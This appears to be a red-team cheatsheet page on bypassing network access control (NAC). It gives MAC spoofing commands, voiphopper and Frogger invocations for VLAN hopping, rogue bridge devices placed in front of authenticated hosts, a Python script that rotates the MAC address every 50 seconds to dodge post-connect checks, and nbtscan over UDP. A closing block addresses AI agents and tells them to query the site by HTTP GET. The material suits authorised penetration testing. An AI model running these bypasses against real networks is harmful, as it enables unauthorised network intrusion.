# NAC Bypass Cheatsheet ### Pre-connect Scenario In a pre-connect scenario decisions to grant access control rights are made before granting any access to the network resources. * **Mac Spoofing**\ It is possible to spoof the mac address of following devices and obtain network access. 1. Physical devices like old VOIP phone, Printers, cameras etc may not support 802.1x authentication and mac addresses assigned to these devices can be spoofed to obtain IP address. 2. Physical access to 802.1x authenticated VOIP phones, printer, etc may disclose mac and IP info from the network settings menu, stickers on the backside, etc. 3. Boot menu of certain workstations, laptops etc may disclose mac address. {% code title="macchanger" %} ```bash macchanger -m XX:XX:XX:XX:XX:XX ``` {% endcode %} * **VOIP Hopping via CDP packets**\ CDP protocol can be abused to hop the VLAN and obtain IP address**.** [**Voiphopper**](https://tools.kali.org/sniffingspoofing/voiphopper) tool can be used to execute this attack. {% code title="VOIPhopper Example" %} ```bash voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1 ``` {% endcode %} * **VLAN Hopping via DTP Packets**\ It is possible to hop vlans by abusing DTP protocol.\ \ [***Frogger***](https://github.com/nccgroup/vlan-hopping) can be used to execute such attacks. ```bash root@kali:/opt/# git clone https://github.com/nccgroup/vlan-hopping root@kali:/opt# cd vlan-hopping/ root@kali:/opt/vlan-hopping# ls frogger.sh LICENSE README.md root@kali:/opt/vlan-hopping# ./frogger.sh ``` * **Pre-authenticated device**\ Pre-authenticated devices can be used to bypass NAC solutions **.** In this situation an attacker will place a rogue device such as a raspberry pi between supplicant and authentication server. The traffic will then flow through the rogue device placed by the attacker.
![https://twitter.com/dafthack/status/610468589569638400?lang=en](/files/-LoSSWfw4_3FDV_Jt4ot) | Name | Link | | ------------ | --------------------------------------------------- | | Nackered | | | Fenrir | | | Silentbridge | | | BITM | | * **Physical access to the network switch**\ Obtaining physical access to the network switch and changing the configuration is one of the toughest but foolproof way of bypassing NAC solutions **🤢.** * **Probe Request**\ Fire up [***wireshark***](https://www.wireshark.org/) and check for MAC addresses in probe request. Try spoofing the MAC gathered from probe request. ### Post-Connect Scenario In a post-connect scenario you are allowed to the network for a small period of time and a set of checks are ran against your endpoint. If the endpoint fails to meet the requirements, it will be disallowed to use any resource further. * **Mac randomization** \ As mentioned before in a post-connect scenario, it is possible to use the network resources for a small period of time while a requirement check is done. In this situation an attacker can change his MAC address to attain a new IP address prior to getting blocked and continue using the network resources.\ \ Below is a small python script which I made to automate this. {% code title="randommac.py" %} ```python #!/usr/bin/python import subprocess import sys import threading import time class MyThread (threading.Thread): die = False def __init__(self, name): threading.Thread.__init__(self) def run(self): while not self.die: print "changing MAC Adress \n\n" + (time.ctime()) subprocess.call(["sudo","ifconfig","eth0","down"]) # change interface if required subprocess.call(["sudo","macchanger","-A","eth0"]) # change interface if required subprocess.call(["sudo","ifconfig","eth0","up"]) # change interface if required print "MAC Changed\n" time.sleep(50) # mac adress will change in 50 seconds. def join(self): self.die = True print "bye" sys.exit(1) if __name__ == '__main__': f = MyThread('first') f.start() try: while True: time.sleep(2) except KeyboardInterrupt: f.join() ``` {% endcode %} ![Random mac ](/files/-LoXJxsfQQAra1asXwff) * **UDP Filtering**\ Sometimes NAC solutions will only disallow TCP connections but UDP connections would still be allowed and an attacker can leverage this to conduct NETBIOS scan in order to obtain IP and MAC addresses. {% code title="NBTSCAN" %} ```bash root@kali:~/Desktop# nbtscan 192.168.112.xx Doing NBT name scan for addresses from 192.168.112.xx IP address NetBIOS Name Server User MAC address ------------------------------------------------------------------------------ 192.168.112.xx xxx xx xx 00:00:00:xx:xx:xx ``` {% endcode %} * **Captive Portal Bypass**
[***Here***](https://blog.0katz.ca/bypassing_nac.html) is great post on bypassing captive portals. Kudos to [***0KATZ***](https://blog.0katz.ca/bypassing_nac.html) for this blog post**.**\ \
#### **Something missing here? Reach me** [***@noob\_pikachu***](https://twitter.com/noob_pikachu) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://redteam.coffee/woot/nac-bypass-cheatsheet.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.